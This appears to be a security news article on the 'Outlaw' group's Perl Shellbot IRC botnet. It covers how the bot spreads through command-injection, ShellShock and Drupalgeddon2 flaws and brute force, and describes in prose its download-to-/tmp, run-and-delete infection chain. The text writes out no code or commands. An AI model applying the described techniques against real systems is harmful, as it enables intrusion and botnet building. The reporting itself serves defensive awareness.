Experts from a cybersecurity firm have discovered an IRC bot nicknamed Shellbot, built using Perl Shellbot
Reports of specialists in digital forensics and cybersecurity from the International Institute of Cyber Security affirm that a new botnet has been discovered that attacks mainly Linux servers and vulnerable Internet of things (IoT) devices. According to the reports, the malware was distributed by a threat group called Outlaw, and is even directed against Windows operating systems.
“We discovered an operation of a hacking group, we have identified them as ‘Outlaw’ (derived from the Romanian word ‘haiduc’, the hacking tool that the group uses primarily), which implies the use of an IRC bot created with the help of Perl Shellbot”, reported the digital forensics experts in an advice.
“The group distributes the bot exploiting common command-injection vulnerability in Internet of Things (IoT) devices and Linux servers. Further research indicates that the threat can also affect Windows-based environments and even Android devices”, the expert report continues.
In recent attacks, hackers compromised the FTP servers of a Japanese art institution and a government site in Bangladesh. Attackers linked the committed servers to a high-availability cluster to host an IRC gatekeeper and control the botnet. The bot had been previously distributed through an exploit targeting the ShellShock vulnerability. In October, experts in computer security and digital forensics noted that the bot was spreading through the Drupalgeddon2 vulnerability.
In the last series of attacks analyzed, hackers took advantage of previously attacked hosts with brute force to distribute the threat and target Ubuntu and Android devices.
The analysis of command and Control traffic (C&C) enabled security investigators to find information on IRC channels and found that in the first infection there were 142 hosts present on the IRC channel.
The IRC channel manager controls the backdoor of Shellbot, which can tell it to perform several activities, including a port scan, various types of denial of service (DDoS), downloading files, and getting information about the infected system.
The attack string starts with the malware that runs a command on the target system, to verify that it accepts commands from the command line interface (CLI). Malicious code changes the working directory to “/tmp” and downloads a payload and executes it with the Perl interpreter. The payload is eliminated in the final step and there is no trace left in the attacked system.
The investigators were able to get downloads from the files used by the threat actors. Experts used the credentials of one of the commands injected into the honeypots, noting that the contents of the files were often modified on the server and that the modification, deletion and addition of files were performed mainly during the day and the early hours of the afternoon in Central Europe timetable.